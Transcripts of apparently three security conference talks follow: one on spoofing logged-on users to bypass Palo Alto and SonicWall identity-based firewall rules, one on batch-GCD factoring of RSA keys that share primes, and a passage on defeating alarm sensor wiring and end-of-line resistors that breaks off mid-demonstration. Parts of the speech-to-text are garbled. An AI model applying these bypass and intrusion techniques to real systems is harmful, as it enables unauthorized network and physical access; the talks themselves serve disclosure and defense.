real thing. So you can see a firewall configured with a user acl. Here it says that only VIP members within vln1 are able to access the fridge in vln2. Then here on the right you can see the x-vectorie console with the specific user group. And on the left you can see a boot client which we'll cover more shortly. If you open the vlnvap members group you can see that the user steve is a member of this group. Then if you look at the follow-out of the user to the agent here we can see the current user IP mapping cache. To show you that I'm not cheating, here on the left we can see that the boot client has one IP address and that it currently isn't listed within the user IP mapping cache. Then it will start to generate some network traffic matching the firewall rule. You would see we're not able to access this specific fridge. Here we can see the agent again. And currently we see a request from the firewall to get information about us. The agent doesn't know. So it's adding us to the probing queue. Meaning if we were to start our own SMB server which is able to respond to these requests we can now return our spoof to you. So we can now return our spoof to you. We can now return our spoof to you. So after starting agent we just have to wait a while for it to stop probing us. And when it eventually does you can see that we just returned the main slec steve as our lockdown user. You can see that then that this information is added to the user IP mapping cache. And on bottom left you can see our ping currently being allowed to access the fridge. So if we switch over to browser again here we can see all the barriers we want to access. Great to say that we just succeeded in bypassing a firewall ACL. So if you want to play around with this stuff it goes and get up. The QR codes on screen are scanned and have fun. As it's just pointing one of the firewall vendors I started looking around a bit more because it might be more out there. So after googling around I did figure out that most firewall vendors have some form of user to IP mapping function but not all of them use SMB as their probing method. Though I did find one called Sonicwall and they reference something on NetAPI. So after looking into it NetAPI is Sonicwall as a solution that's basically much the same as Apollo Auto User ID. It's configured on agent which is installed on the network and it starts collecting information from an X directory or you know client probing. The only main difference being is that the documentation of Sonicwall is mostly scattered all around. Depending on what documentation you happen to be opening you're either told to use leach privileges or you're told to just use administrative rights. Apart from that there's a much else going on so we can just jump right into the demo. Here we can see the Sonicwall SSO agent being configured to start probing clients using NetAPI and if we switch over to firewall we can see that clearly there's a rule which says if we want to access Google we need to be a specific user in this case being administrator. Then if we start the generation traffic you can see we clearly aren't allowed to access this resource. If we then look at our SMB implementation you can see that we supplied the username administrator and corresponding domain. And after starting this service we just have to wait a while for the agent to start probing us. And when it does you can now see by returning the correct information we're able to allow access to this firewall ACL. So I just showed you how to pump two different vendors using arbitrary spoof user information but there is this caveat I neglected to mention this far. And this caveat basically covers how SMB guest access work with an unpacking in Windows. So whenever an SMB unpacked SMB server is started without any form of authentication whenever authentication fails it will fall back to an SMB guest access session. Meaning that our probe request thus far has made use of an SMB session with guest access enabled. The issue being here is that shouldn't be possible by default in a recent version of Microsoft Windows. By default this should now exist a registry key which will prevent the client from accepting SMB server session with guest access enabled. But you know up to this point we have a lot of problems with this. So as it turns out even though Microsoft said this registry key should exist by default within a specific version of Windows it clearly doesn't exist within Windows tank lines. However it doesn't serve in 2019. Meaning if you were to install this agent on a server 2019 server this exploit wouldn't work. If it's installed on a Windows tank line I would recommend you to check if this registry key exists and if not enable it. So let's cover the disclosures. I started my first disclosure with Poloauto and shared two findings. The SMB has disclosure and the actual biopositional firewall ACLs. I was then informed that nutbase client problem will be dropped from further versions of Poloauto user ID. Though at some time I was informed that this issue would not warrant a CVE because this was an issue with the Microsoft protocol itself and not Poloauto. Then after that after being told that I was added to the Hall of Fame. I clearly don't know the status of the dropping of nutpiles. The latest response of the vendor was that the fix is already present in the product because the client doesn't need to use this. Then we can cover the disclosure of Sonocall. I started the disclosure at the same time. And then after some while they informed me that the issue was actually a duplicate. Besides that they told me that they would add a warning whenever the user administrator was used. So on my head I thought it was kind of a dumb thing because we're just going to take this all if statement, smack it on the issue there and call it a day. So naturally I shared my concerns with the vendor and I asked them which of my vulnerabilities were a duplicate from the other researcher. After some time I received an email which informed me that the release associated CVE number for the issues. So looking at the disclosure of the vendor I figured out who the other researcher was, said the conclusion. I then sent him a message asking basically what did he disclose to Sonocall. Then after talking to him I figured out that he didn't perform any ACL bypasses. He disclosed the SMB hash disclosure part. Meaning that Sonocall just took both of our findings, took mine onto his and called it a day. Anyhow, regardless of that I still wanted to figure out if there were any other fixes they implement besides the if statement which is going to check the user administrator. So I installed the agent and I did find out a couple of things. The if statement is there. It only does actually check if the username is called administrator. It doesn't actually check the effective rights of the user. Meaning if you were to create a user and give it domain admin rights it will not prompt the warning. Besides that this warning only prompts when you configure the service account in a later stage not during the initial installation when this is initially set. They also changed the default probing method before the disclosure this was net API. Afterwards it changes over to WMI. They also updated the documentation. They do now reference that you should use a local administrator when you want to use net API based probing. So you know what's next for this research. There is potentially a vendor tree. I expected them to also be vulnerable. Their implementation is slightly different than what we talked about today but I think they're vulnerable so I already started a disclosure process for them. Besides that I did notice there were a couple of vendors which used a WinRack name pipe. This WinRack name pipe references to the Windows registry and they basically performed my check with the registry to enumerate the lockdown users. It would require some further research but I think this is also vulnerable to the same thing which we talked about today. Also there was a lot of vendors which used WMI to perform the probing requests. Currently there are no open source implementations of setting up a your own WMI server so if we're able to implement this within some product or some open source tools we might be able to break a lot of the file wall vendors. Apart from implementing new protocols and that kind of stuff we might also be able to abuse the caching function of the agents. Let's imagine you have someone working within a corporation. It's a five o'clock to leave for home. We might be able to reuse his IP and sign it to ours and hopefully the IP address still hasn't been used to IP mapping cache. Other than that we talked about firewalls today but there might be other products out there which use a similar technique. Even though we don't think they wouldn't use SMB for probing with WMI it wouldn't surprise me if they were to support an SMB based probing method. And now I use the same idea we talked about today. You might be able to trick the vendor or product into doing something unexpected by returning arbitrary information. So the conclusion and takeaways. The first one, why I think client probing is generally a bad idea. Besides the whole password spraying and hash disclosure part of a probing based on SMB, I think that generally client probing is a bad idea. You know, regardless of the protocol used, you're never sure that the endpoint you're talking to is returning arbitrary or spoofed information. And you know, basing a logic of a product for for example, applying security rules around that is in my brain a bad idea. And as of today, this can now be exploited by the M-packet implementation I built but it wouldn't surprise me if you were to kill the existing user within Windows and spin up your own. You would be able to exploit this natively within Windows. Another big one being is just because a vendor supports a specific feature. This feature does not mean it's secure by default. In both cases, the vendors we looked at today supported a method which is generally known to be insecure. And in both of the cases, you know, it was enabled by default. You as a person really need to practice your due diligence when it comes to looking at these extra features. You know, you need to look at how to implement it and ask yourself, you know, the what if questions. What if we're able to respond to these requests? You know, is it actually safe and you know, a smart idea to base our rules around this. So thanks listening to me about rambling about firewalls for 45 minutes. If you think you got something wrong please reach out to me on Twitter. And if you want to play around with stuff yourself, you can use my Instagram. That's all from me. Have a nice day.
|
By responding to probing requests made by Palo Alto and SonicWALL firewalls, it's possible to apply security policies to arbitrary IPs on the network, allowing access to segmented resources. Segmentation using firewalls is a critical security component for an organization. To scale, many firewall vendors have features that make rule implementation simpler, such as basing effective access on a user identity or workstation posture. Security products that probe client computers often have their credentials abused by either cracking a password hash, or by relaying an authentication attempt elsewhere. Prior work by Esteban Rodriguez and by Xavier Mertens cover this. In this talk I will show a new practical attack on identity-based firewalls to coerce them into applying chosen security policies to arbitrary IPs on a network by spoofing logged in users instead of cracking passwords. Logged on user information is often gathered using the WKST (Workstation Service Remote Protocol) named pipe. By extending Impacket with the ability to respond to these requests, logged on users on a device can be spoofed, and arbitrary firewall rules applied. We will dive into the details of how client probing has historically been a feature that should be avoided while introducing a new practical attack to emphasize that fact. REFERENCES https://www.coalfire.com/the-coalfire-blog/august-2018/the-dangers-client-probing-on-palo-alto-firewalls https://isc.sans.edu/forums/diary/The+Risk+of+Authenticated+Vulnerability+Scans/24942/ https://github.com/SecureAuthCorp/impacket https://www.rapid7.com/blog/post/2014/10/14/palo-alto-networks-userid-credential-exposure/ https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClXHCA0
|
10.5446/54190 (DOI)
|
Hello, DefCon. Thank you for tuning into my talk, being broadcast from Raleigh, North Carolina. My name is Austin Allshaus. I'm a research scientist at Bitsite. And as part of my job, I do a lot of surveys and studies of security best practices across the internet. And today, I'm going to walk you through some of the low-level details of how to do one study that I did recently involving compromising RSA keys through factorization. While this talk is nominally about how to compromise a specific subset of vulnerable RSA keys, what it's really functionally about is a scalable method to calculate shared factors across large batches of integers. And that's because that is the mechanism by which we are going to do it. There's been a lot of past research on this topic, and many of the researchers have sort of simply attested that they built a custom, scalable, distributed batch GCD implementation to factor keys collected from the internet. But many of these studies have been fairly light on implementation details. So this talk is going to walk you through what distributed batch GCD means and how to implement it yourself in order to break some RSA keys. I'm not going to give a whole RSA recap, but there is one thing that you need to know in order to understand the content of this talk. The first step when producing an RSA key payer is to select two random prime numbers, and the product of those two prime numbers is shared as the modulus of the public key. The security of RSA is dependent upon the fact that given a sufficiently large key size, it is not tractable to factor that public modulus back into those constituent primes. And the secrecy of those primes is critical to the security of the private key. But while large integer factorization is a computationally difficult problem, fast and efficient methods do exist for calculating the greatest common divisor of two integers. This means that if any two RSA keys just happen to choose one of the same primes when generating keys, both of those keys can be easily compromised by calculating the greatest common divisor of the two keys. In theory, this should never happen, as the number of potential primes to choose from is so mind-bogglingly large that it would never actually happen by chance. However, back almost a decade ago, two research teams actually found out that many RSA certificates collected from the internet do in fact share primes with other certificates, this making them trivial to compromise. And they were able to attribute this phenomenon to flawed implementations in pseudo random number generators ceding the key generation process. Over the years, this phenomenon has been revisited with researchers collecting and evaluating larger and larger batches of keys, necessitating various big data approaches to this problem. This culminated somewhat in a really interesting talk back at DEFCON26, in which some folks from Kudeski security really industrialized the key acquisition process and evaluated hundreds of millions of keys for a variety of weak implementations, but including this shared prime factor vulnerability that I'm discussing today. So the question really sort of boils down to, if some RSA keys do share primes and they can be compromised by finding share factors across them, how do you calculate the greatest common divisor across hundreds of millions of keys? To answer that question, we need to go back over 2000 years to what is one of the oldest known algorithms, the Euclidean algorithm, which is used to calculate the greatest common divisor of two numbers. It works by recursively calculating remainders between two numbers until the greatest common divisor of those two numbers is reached, which it may just be one if the two numbers don't actually share any common factors. In this trivially small example on the slide, comprised of four products of prime numbers, by calculating the pairwise greatest common divisor of each combination of numbers, we can discover that one pair does in fact share a common factor of seven because it has a greatest common divisor greater than one. While this slide is using small integers just for illustrative purposes, these integers could just as easily be real RSA moduli, and this is a perfectly valid way to compromise keys if there does happen to be a shared prime factor within a small batch of keys. The Euclidean algorithm is fast and efficient, but because you have to do these pairwise combinations, attempting to calculate the greatest common divisor across hundreds of millions of keys could potentially require hundreds of quadrillions of iterations of this algorithm, which means it is really just not scalable to that problem. So skipping ahead over 2,000 years again, a cryptographer named Bernstein published an efficient method for calculating the greatest common divisor across batches of numbers. Like many problems in computer science, it uses an intermediate tree data structure to bypass the requirement of having to calculate every pairwise combination of numbers. In simplest terms, Bernstein's method builds a product tree by calculating the products of pairs of numbers in the batch and then repeating this process up successive levels of the tree until the root of the tree represents the cumulative product of all numbers in the batch. It then decomposes this product tree back into remainders by calculating the remainder of each parent node with respect to the square of its child node until the leaves of the trees represent the remainders of each integer in the batch with respect to the cumulative product of the whole batch. A final greatest common divisor step is computed on each leaf remainder, which will reveal if that particular integer shares a factor with any other integer in the batch. This is a very similar approach to the Euclidean algorithm, with the key distinction being that the shared factors are being discovered with respect to the cumulative product of the whole batch instead of the various pairwise combinations of all integers in the batch. This is a very effective approach specifically for the RSA key factorization problem because in general, shared factors are relatively rare and therefore it's very likely that any factor output by this method will be one of the actual primes used in key generation and it's less likely to be some sort of composite value representing multiple shared factors in the batch. So I understand this may be very difficult to visualize just from a verbal description, so I'm going to walk you through an actual explicit example. In this example, we're using the same prime products as before, which contain two products with a shared factor of 7. Building the product tree is merely a process of pairing off the integers and calculating their products at each level until we get the cumulative product of the batch represented in green. After that product tree has been formed, the remainder of each parent node is calculated with respect to the square of its child node. When the bottom of the tree is reached, the greatest common divisor is calculated between the resulting remainder and the modulus. And if this value is not 1, it means it shares a factor with some other modulus in the batch. In this same example, the two shared factors of 7 are output just the same as using the pairwise Euclidean implementation described earlier. While this implementation is very fast, it does raise a new challenge in that these product trees can potentially get very, very large. Such a tree of 150 million 2048-bit RSA moduli would be over a terabyte in size, which can be very difficult to manage, especially on a single machine. So say you don't have a machine with a terabyte of memory. There's actually a pretty straightforward way to make this calculation much more manageable. Instead of making one very large product tree, you can make a few smaller ones. Breaking that 150 million batch into five smaller batches will produce product trees that are roughly 180 gigabytes in size, which can be quite a bit more manageable and potentially processable on just a single machine. There is a major downside to breaking the tree up into smaller batches, however, and that is in order to get coverage of the shared factors across these different batches, the remainder trees must be calculated with respect to each other tree, which requires this permutation step of all the trees. While this is less efficient, in practice, it could actually be faster because all the arithmetic is being done on much smaller numbers, and there's no bottleneck where we're trying to calculate arithmetic on really huge integers at the root of a massive monolithic product tree. So to walk you through another explicit example, here we have two batches of prime products. The first batch is the same one as we had before that shares a prime factor of seven. The second batch has a shared factor of 23. And then across the two batches, there is a shared factor of 17. When calculating the remainders for each tree against the cumulative product of both trees, all of these shared factors end up falling out at the bottom. And the permutation of these trees is really important because otherwise that 17 factor, which is shared across both batches, would not have been discovered if we were only evaluating the trees within each batch. By calculating the product trees and then permuting the remainder trees in this way, the calculation of shared factors across a huge number of integers can be broken down into batches and parallelized across any number of machines without any necessary outrageous memory requirements. The sizes of the trees and the number of the batches can really be tailored to the compute and memory resources available. Here's an example architecture that I used to factor 86 million RSA keys using just commodity hardware and no specialized software. The factorization code was all written in Go and all that really is is implementing this product tree and remainder tree logic that was covered earlier. The arithmetic was calculated using the native C GNU multi-precision library since allegedly it is quite a bit more performant minutes go counterpart. RSA module I were read from S3 and the product tree levels were stored to EBS and they were just serialized using Go's native built-in GOV library. The transparency and calculating the various values at each tree level was done just using Go routines and orchestration of all the tree permutations was just a simple shell script. No specialized software, no big data frameworks needed. So I used that architecture to factor about 86 million keys from certificates collected from the internet over about a three month period and found some interesting results. Less than 50,000 of those keys were able to be compromised due to sharing a prime factor. This is a much lower number than I was expecting and also a much lower number that had been reported in prior years. As a sanity check, I went back and collected samples of keys dating back six years and discovered that sure enough the prevalence of this type of vulnerable key has decreased dramatically over the years. The chart on the slide represents the number of keys that could be factored from a random sample of 100 million keys collected in a given year based on sharing a prime factor with some other key in that same 10 million key sample. I think the dramatic decline here observed here is really a testament to the impact of prior research as it appears to have made vendors address this problem as it is far or less prevalent today than it was just a couple years earlier. Out of the keys that were still vulnerable, they almost exclusively appeared in networking devices and embedded systems. But I think the question still remains, if this issue has largely been remediated and if it is trending downward pretty dramatically, why are there still so many vulnerable keys on the internet? Well reviewing the certificate validity lifetimes of the vulnerable keys provides some insight into that. The charts here show a histogram of validity dates of vulnerable certificates compared to a random sample of certificates from the internet. The long tail of the not valid before dates hint that perhaps the certificates are just really old devices. And the not valid after dates on the right show that over 10% had expired over a decade ago and that helps really reinforce this fact. Many of the vulnerable certificates likely just represent really old networking equipment that is probably lost in a closet somewhere and it's still connected to the internet and the owners and operators just don't even realize that it's there and online. Out of the roughly 150 million total keys analyzed, only a single vulnerable key was signed by a trusted third party certificate authority. Every single other vulnerable key was either self-signed or signed by an internal CA that's not publicly trusted. The suggests that the likely culprit of many of these keys are devices that are automatically generating certificates and this is somewhat reinforced by the absurdly long validity durations present in the second chart on the right and this is done likely as a convenience by vendors and of course this is not in line with best practices for certificates. When reviewing the organizations that were actually hosting these vulnerable devices, the trends are generally what you would expect. Organizations and industries that typically have very mature security programs that invest a lot in security, industries such as financial services were the least likely to be hosting vulnerable devices and industries that are more notorious for perhaps lax practices such as utilities were more than 10 times as likely to be hosting a vulnerable device than their low risk industry counterparts such as financial services, insurance and legal. Finally, I saved this chart for last because I think it is really the most important chart of the whole presentation. This chart represents the relationships between vulnerable prime values where an edge exists between two primes if they appeared in the same RSA modulus. The coloring represents the product families that the primes appeared in. For example, one color is Huawei switches, one is D-Link routers, etc. It becomes very obvious that the relationships between these primes are mostly disjoint between different products. This is really important because if they are disjoint, attempting to find shared factors across product families is somewhat of a fruitless exercise as the vendor specific random number generation flaws appear to only create prime collisions within their given product family. The implication of this is that you don't necessarily need a big data approach of collecting some huge corpus of keys to compromise keys via this method. Small collections of keys specific to a given networking device or embedded systems product are likely to be vulnerable as a massive collection of random keys that have been harvested from the internet. Much of the analysis on these flawed keys in the past has focused on keys collected from the public-facing internet, but I think this chart really shows that there may be opportunities to find additional vulnerable products in devices that are not typically exposed directly from the internet. For anyone who is able to make product targeted key collections behind an external firewall of a large organization or perhaps across many smaller organizations. So to wrap things up, almost a decade after the discovery of this phenomenon of the prevalence of shared primes and certificates on the internet, there's still a fairly large number of devices that are factorable due to these shared primes. However, this seems to be primarily the result of really old devices and not necessarily from new vulnerable products. The culprits here seem to be primarily automatically generated certificates from networking equipment, so maybe don't trust those certificates. And finally, you don't really need specialized software or a massive corpus of keys in order to compromise keys in this way. If you can get small targeted collections of keys from specific networking equipment or embedded systems products, that can potentially yield results. And to end things up, I published a reference implementation of the distributable batch GCD method described in this talk at the link on the slide. It will demonstrate the successful factorization of a small batch of actual RSA moduli. This implementation is really just for illustrative purposes. It was written in Python in order to be very simple, clear, and concise. But as a result, it's also very, very slow. It will not scale. If you want to do this on larger batches of moduli, I highly recommend that you translate the code into your favorite compiled language of choice. And I will close things with that. Thank you for tuning in, and I hope you enjoy the rest of DEF CON 29.
|
Over the past decade, there have been a number of research efforts (and DEFCON talks!) investigating the phenomenon of RSA keys on the Internet that share prime factors with other keys. This can occur when devices have poorly initialized sources of “randomness” when generating keys; making it trivial to factor the RSA modulus and recover the private key because, unlike large integer factorization, calculating the greatest common divisor (GCD) of two moduli can be fast and efficient. When describing their research, past hackers and researchers have attested that they “built a custom distributed implementation of Batch-GCD;” which seems like one hell of a detail to gloss over, right? This talk will detail a hacker's journey from understanding and implementing distributed batch GCD to analyzing findings from compromising RSA keys from network devices en masse. REFERENCES: Amiet, Nils and Romailler, Yolan. “Reaping and breaking keys at scale: when crypto meets big data.” DEF CON 26, 2018. Heninger, Nadia, et al. "Mining your Ps and Qs: Detection of widespread weak keys in network devices." 21st {USENIX} Security Symposium ({USENIX} Security 12). 2012. Hastings, Marcella, Joshua Fried, and Nadia Heninger. "Weak keys remain widespread in network devices." Proceedings of the 2016 Internet Measurement Conference. 2016. Kilgallin, JD. “Securing RSA Keys & Certificates for IoT Devices.” https://info.keyfactor.com/factoring-rsa-keys-in-the-iot-era. 2019 Daniel J. Bernstein. Fast multiplication and its applications, 2008.
|
10.5446/54194 (DOI)
|
Hello! I hope you're as psyched as I am for me to talk at you for 45 minutes all about wires. The hacker community has picked to bits many other aspects of physical access control, but the communication lines themselves remain largely a black box, and thus despite them being manifestly exploitable, which we'll look at today. So I'm sure you've seen this particular trope, the laser hallway where the protagonist does all sorts of incredible gymnastics to get by these lasers without tripping them and get to whatever goal exists. That's one defeat mechanism is avoiding the sensors entirely, but if we can access any part of the wire that connects the actual light detector to the upstream controller, we can then walk through all these lasers without a care in the world knowing that our activity will not be reported on. In a more real-life example, you'll see these all over, and if you haven't yet, you will now that you've known to look for them. Magnetic door contact sensors, they might look like this, or they might be mounted inside the frame, and they will detect when this door gets opened. The hackers among us will likely look at this wire here and say, there's got to be something we can do with that to avoid this device actually reporting when the door gets opened, and of course there is. So this is a talk about the sensor communication wires. We'll give a brief high-level overview of alarm systems and access control first, and then we'll talk about two ways to defeat those and to defeat end-of-line resistors, which is the most common defense and anti-tampor mechanism applied, and then we'll talk about some defenses that work against these attacks. I encourage you to go try it yourself in the Lock Bypass Village. Everything that I'm talking about today and everything that I'm showing is available as hands-on demonstrations for you to go try. So let's look at a couple of the sensors that are available. There are a lot of magnetic contact-based sensors that detect door and window opening. You might also have an area sensor such as Passive Interred, or one that seismically detects someone walking on ground, or that uses vibration to detect fence climbing. In this example, we have the floor plan schematics for a number of different ways to protect windows. So there is a contact sensor to detect the window being opened, and two different types of glass break detectors to detect someone breaking the glass through. If the window can be opened or broken, we might want to have both. Now in days gone by, electronics were expensive and difficult to build, and so we wouldn't want to have an input to the controller for each of these individual sensors when they're all on the same window. The way that was handled was with alarm zones. So a zone is multiple sensors wired together. If any of them get tripped, the alarm gets tripped for that zone. So a normally closed zone will have switches that are normally connected, but they'll disconnect in the event that the sensor gets tripped, and then they're wired in series. So either disconnecting creates the alarm, and a normally open zone are wired in parallel. So if either of them connect, then the alarm will go off. Zones are also often applied to rooms, and that's why they're called zones. So any sensor in a particular room will trigger a single zone in the controller, and they'll all be wired together in that way. So we might have all of these sensors for the door being opened into the vestibule being wired into a single zone, or all the various window glass break type detectors on this room being wired into another zone. You can see an example of alarm zones with fire control systems. They are a lot more publicly viewable than security systems, and in the foyer of many large buildings, particularly with Western Hemisphere fire codes, you can look at what the zones specifically are. So is stairwell number three having a fire alarm in it? Are various other aspects that this system needs to monitor behaving correctly, and are the wires intact? And that is all going to be displayable there. The second aspect where these technologies get used is with access control systems. Alarms that we've just talked about so far at least, are relatively binary. They're trying to look for any person entering the perimeter without discriminating who it might be. Access control systems will make that determination of is it an authorized user, and it should only alarm when it's not. To the most basic access control system has an authentication device such as a card reader, and it has some means of physically allowing or denying the door to open. We might want to add a contact sensor to the door, so if the door gets opened, and there was not a card swiped, it can then trigger an alarm and indicate an unauthorized entry. If someone's leaving, that creates a problem. So we also want to have in what's called a request to exit sensor, and this particular type uses passive infrared to detect a person on the secure side of the door waiting to leave. If it detects that, and the door is subsequently opened, there's no alarm. We'll look at some of the technologies available for these different systems. So the authentication can be done with various different technologies of card readers, and there's lots of great talks so far about how to defeat those, which I won't go into anymore. It could all also involve biometric, or a code, or even a video doorbell, where a human remotely makes the go or no go decision of whether this person should be admitted. In terms of allowing the door to open or keeping it locked, we can use magnetic strikes or a magnetic lock that magnetically holds the door shut. We can also use hardware that can be remotely controlled to lock or unlock, turn style based systems, or even a vehicle entry door. Detecting that the door is open is usually done with a magnetic switch, almost always like these three here. It might be an optical base switch though, or even a mechanical switch that is pushed in when the door is closed, and some hinges can detect their position as well. And finally the request to exit is usually done with passive infrared. It might be button that you press, or pressing on the egress hardware itself will trigger the request to exit, saying that there is someone on the far side, and in secure installations it might be another card reader, so you have to badge in and out. Here's an example of one of those in the wild, so it's a passive infrared detector mounted over the door, and we also see an in-frame door contact sensor over here that will pair up with this magnet in the top of the door, and when the door is closed those are going to be together, and it will detect that the door is closed. There's a couple other pieces of hardware we can potentially exploit. One is if there's a key switch that tells the controller when it's supposed to be building open and closed hours. Another is accessibility buttons, particularly the one on the secure side of the door. If it gets pressed that will usually also trigger an unlocking sequence, and disable the alarm from the door being detected to be open, and the fire system. So when a mag lock is installed, if there is a fire situation, it has to unlock by code, otherwise people will be stuck inside, because otherwise the security system would be keeping it locked, and so if we trick it into thinking that there's a fire going on, that will also unlock the door for us. We won't look at these communication lines to the mag strike and the reader. That's a bit outside the scope of this talk, but everything else that's remaining on this screen is a binary communication line. It carries a yes or a no, and we can attack that to disable the alarm and cause the door to open, and in other ways defeat these systems. So we can attack the contact sensor itself to make it think the door remains closed when we've actually opened it and gone inside. We can attack the request to exit sensor to make it think someone is exiting, and then we can safely enter without triggering an alarm. We can attack the accessibility button to make it unlock, open the door, and disable the alarm. We can attack the key switch to make it think the building is open, and the fire alarm, or the communication from the fire alarm to make the security controller think that we're in a fire alarm situation, and then it will open things up accordingly. So here's one relatively straightforward example of where those wires can be accessed. So this key switch here, you can see that this can just be unscrewed, but also anywhere up this conduit will also have access to disable that alarm at the wire. The wire is often running conduits like this, and so we need to find those and then determine which ones contain the wires we're interested in. Well how is that done? Sometimes it's labeled for us. This one says FA means fire alarm, so that is generally not one that we'd want to be looking at for this purpose. One that says door contacts is much more interesting. This one also does contain fire alarm wires, but also the door contacts, and this one's security junction box is also likely one we'd want to look into. In this case we can tell contextually, well this conduit is going to about the right position for a contact sensor to be mounted on the door, but we can tell from this bolt pattern that likely that's not what it's for. It's likely to a mag lock, and they generally get mounted with this type of bolt pattern. It might also have a contact sensor here as well, and that can be defeated as well, but it's beyond the scope of this talk. Of course sometimes it just tells us, do it unplug, well the wire has been cut, I guess that's technically not unplugging, and sometimes there's very subtle contextual clues to tell us what general area of the building contains the wires we're interested in. Sometimes we can find the sensor itself and just follow the conduits back from it to figure out which wires we need to attack, and if we see a card reader or other access control type hardware that does tell us that there will likely be intrusion detection sensors that we need to find and defeat. And then the last thing that sometimes gives us access is when conduits run outside. It's a very bad idea to run your security wiring outside, but it is seen particularly in historical buildings where there's not adequate duct space inside, and that's something that we can open this right up and defeat the security system from the outside. Here's a particularly egregious example where we have the contact sensor, and this is actually all mounted on the unsecure side of the door. Definitely something to avoid. If we wanted to apply our attack it might not make sense to do it right here because it's extremely obvious to anyone passing through this area. So how would we find way back on the line which one is the right one? If we follow it to a conduit, and that conduit might have a rat's nest of cables in it, we need to determine which one is correct. Let's take a look at how to do that. Now if we have access to the wire at one point, we want to know where it goes, possibly to place our attack payload at a more desirable location. There is a tool we can use called a toner and probe. So we'll take our toner and clip it onto the line we want to follow, and it will put a tone down that line, which we can then listen to with our probe device. And so anywhere down the line we can then tell that of these two this is the one connected to what we're toning and not the other one. So once we've found the correct wire to attack and a good place to apply the attack, how do we actually do it? So in the situation of a normally closed sensor, so it's connected in the normal situation and it disconnects when there's an alarm condition. In that case, all we need to do is jumper the line, and that will then simulate the switch being connected and no alarm will be raised. So in this case here it's a normally closed system, and we see that there is zero equivalent resistance seen normally. When I open the door it becomes an open circuit, so it's disconnected. To defeat that, all we have to do is cut the line and that briefly causes an alarm, but we'll fix that momentarily, and then we'll strip the outer sheath and then the inner sheaths, and we just need to jumper from one to the other. And now the controller continues to see an equivalent resistance of zero and the door can be opened with a band. Of course that does trigger the alarm initially, so a better way to do it is to strip just the outer sheath and then tap into the inner wires, but leaving them intact. And once that's done we can now apply a jumper wire between these two taps, and it has the same effect. When we open the door it continues to see no equivalent resistance and no alarm is triggered. The second case is a normally open switch, so in the normal situation it is disconnected and the switch will connect when the door gets opened. To defeat that all we have to do is cut the line and then it always sees an open circuit. So in this case when we open the door it goes from open circuit to a short circuit. If I cut this line it now always sees an open circuit. The defenses against this, so it's vulnerable to have just a symbol, a simple high or low resistance listening for. Instead we're going to switch between two different resistance values. So this is what's called an end of line resistor, and it's less vulnerable. It listens to see is it the resistance one for a normal situation or two for an alarm condition. If we detect an open circuit, so a cut line or a short circuit, it will then trigger a different alarm indicating a tamper situation. And of course the best defense would be a well-designed encrypted digital communication line. Those are much more expensive and have limitations for the maximum wire run, so they're much less common to see. These end of line resistors though are ubiquitous. So how do we defeat those? Well before we get into that we'll do some very brief review of resistors in general. So there's only three slides I promise. The first concept to remember is that resistance measured in ohms is how hard it is to put power through it. And by Ohm's law it is the voltage applied across the resistor divided by the current that then gets flowing through. The second aspect to keep in mind is two resistors wired in series will have an equivalent resistance that the sum of them and when they're wired in parallel it's going to be this harmonic sum which makes some sense when you think about it. One over resistance is how easy it is for power to pass through just like resistance is how hard it is and in fact there's a name for it conductance. And so with resistors wired in parallel the conductances add up. There's sort of a fun graphical computation available to us here by taking three equal scales at 60 degree angles. We can apply a line from our two resistances. So if r1 and r2 are both a thousand ohms the equivalent for them in parallel will be 500 here. 800 and 400 will then give us about 267 ohms equivalent in parallel. So that's kind of a cool tangent there. Keeping that in mind we usually don't have switches that flip between two separate resistors. Instead we have a simple normally closed or open switch that will engage one resistor while the other is always connected. So in this case when the switch gets closed we now have the equivalent resistance of these two seen in parallel. But I'll continue to use this style of diagram for clarity in the rest of these demonstrations. The last part that we'll have to consider is how does the controller measure resistance. So it can put a voltage across the line and measure the current through based on Ohm's law. What's more common is to have it put a voltage across the line and have some sort of internal resistance. And then it measures the voltage between that internal resistance and the end of line resistor. This is what's called a voltage divider. So there's going to be a certain voltage applied by our power source. There's going to be a voltage drop across the internal resistor and a voltage drop across the end of line resistors. The sum of those two resistor voltage drops is going to equal the applied voltage. And how much of a voltage drop applies on each is going to be dependent on the relative resistance values of those two which we can then measure by this voltage in the middle. So two special cases that are relevant here. When we have an open circuit situation no current flows. The ammeter will measure zero. And because no current is flowing through this internal resistor it has no voltage drop across it by Ohm's law. And therefore the voltage measured is equal to the source voltage. In the case of a short circuit a lot of current will flow. If there's no internal resistor it's going to do some damage. And we're wiring now the top and the bottom of our voltmeter together. And so the volt meter was going to measure zero volts. For instance one commonly seen system is Honeywell Design Systems where there's a 2.8 kilo ohm internal resistor and two kilo ohm end of line resistors. When this circuit gets closed or completed we then have a voltage divider that creates five volts measured by the controller. And when it gets opened we have the full 12 volt source that is measured by the controller. What do these end of line resistors look like? Well they're a lot easier to spot with fire systems where they tend to be in large well-labeled boxes such as these supervising the alarm bell, these end of line labeled devices here, or this supervising the firefighters telephone. This is called line supervision in fire alarm systems. And it's done because if the line gets accidentally or environmentally damaged people could die. And they tend to be in large well-labeled boxes because for fire alarms it's important that they be easily accessible and inspectable. With security the opposite is true. So security end of line resistors tend to be installed directly inside the sensors that they're supervising. In this case we have one installed between these two leads here which ends up being in series with the tamper and the regular infrared detector relays. And that will then detect whether either of those gets tripped and if they're both in the normal state we will see this resistance at the controller. And so we can see that a little bit zoomed in here. So attacking these end of line resistors is a somewhat involved process because we don't know from the outset what the end of line resistance value is, what the polarity is, etc. So let's take a look at how that might get accomplished. So first we'll strip the line and we'll tap it in two places and this is going to enable us to measure the voltage on this line. We'll install a voltmeter and wire it up. And it now measures 5 volts across this line. If we would open the door we would now see 12 volts across. The second thing we need to measure is the current. Once we have voltage and current we can divide the two and get the equivalent end of line resistance. And to measure current it has to pass through our ammeter. So we'll tap this line in a second place and install an ammeter here. And then we'll have the current run into our ammeter and we'll have it run through a switch. You'll see why in just a second this is so that we'll be able to engage our attack when we're ready to do that. And so I'll run the wire to the switch and then from the switch to our tap device. And now we're seeing zero current. This makes sense because it's still passing through the line right here. So I'm going to need to cut this line and then we'll actually measure the current passing through. And we now see that this is 2.5 milliamps approximately. So what can we do here? Well we have the voltage. It's about 5 volts and the current about 2.5 milliamps. And if we divide those two we get 2000 ohms or 2 kilo ohms because this is milliamps. So we'll now find an appropriate resistor that's as close to 2 kilo ohms as we can. And the one we have this closest is 1.96 kilo ohms which we'll install right here. And now what we need to do is on the other side of the switch when we flip it we'll instead route current through this resistor and then over to the negative line. So let's install that now. So wire the switch to the 